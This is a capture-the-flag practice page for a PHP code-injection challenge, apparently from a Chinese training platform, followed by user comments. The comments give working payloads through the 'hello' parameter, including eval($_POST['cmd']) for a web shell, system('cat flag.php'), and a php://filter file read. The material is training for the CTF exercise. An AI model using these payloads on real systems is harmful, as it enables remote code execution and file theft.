评分(10)
解题动态
542698 攻破了该题 20分钟前
slsdy 攻破了该题 3小时前
IamnotLin 攻破了该题 11小时前
zzZxby 攻破了该题 14小时前
yyc4088 攻破了该题 15小时前
xhonggcc 攻破了该题 17小时前
570570 攻破了该题 18小时前
lilym 攻破了该题 19小时前
color111111 攻破了该题 22小时前
18996315220 攻破了该题 1天前
BLX123 攻破了该题 1天前
xjn12 攻破了该题 1天前
SDLbyZ 攻破了该题 1天前
771232546 攻破了该题 1天前
19941759966 攻破了该题 1天前
lancertyk 攻破了该题 2天前
zdabajfk 攻破了该题 2天前
---snow--- 攻破了该题 2天前
1293273679 攻破了该题 2天前
评论
1293273679 2天前
举报
蚁剑直接 url/?hello=eval($_POST['cmd')
1nfinix 7天前
举报
构造payload: ?hello=);highlight_file('flag.php');// 或者 ?hello=);system('cat flag.php');//
lins11 23天前
举报
/?hello=file_get_contents(%27php://filter/read=convert.base64-encode/resource=flag.php%27) ->base64解码
叱咤月海鱼鱼猫 1月前
举报
?hello=highlight_file('flag.php')
banfang 2月前
举报
点击场景后将代码发送给豆包等一分钟基本上就可以了
pks0 2月前
举报
?hello=1);highlight_file(%27flag.php%27);//
一个姓⎝李⎠的师傅~ 4月前
举报
知其然,不知其所以然,以后还是不会类似的题目:(下面是我写了 1 天的思路,保证你看完以后一切都明白了!!!) https://www.yuque.com/u21437924/ap9vtm/gqkc3dcfmfpe5p85?singleDoc#fYY9d
pipipikaqiu 1月前
举报
写的好详细,太好了啊
一个姓⎝李⎠的师傅~ 1月前
举报
@想好思路再支付 有帮助就好,感谢老铁的认可!!!
想好思路再支付 1月前
举报
思路讲的真好啊李师傅
ubudj 4月前
举报
?hello=file(%27flag.php%27) ,%27 是单引号(')的 URL 编码形式。 确保 file() 函数能正确识别要读取的文件名
默认 4月前
举报
hello=a=system('ls'),发现能输出东西,剩下的就是ls换成你想要做的命令,然后试试cat flag.php 这个cat是输出东西的,然后换成其他的东西都行,cat不行就tac,能出来答案 ps:在根目录下有一个叫做flag的文件,这里用 cat /flag 是没有问题的
wywsssf 4月前
举报
找到参数hello,首先?hello=system('ls'),看到flag.php,再执行?hello=system('cat flag.php'),发现无内容,尝试把cat换成tac则成功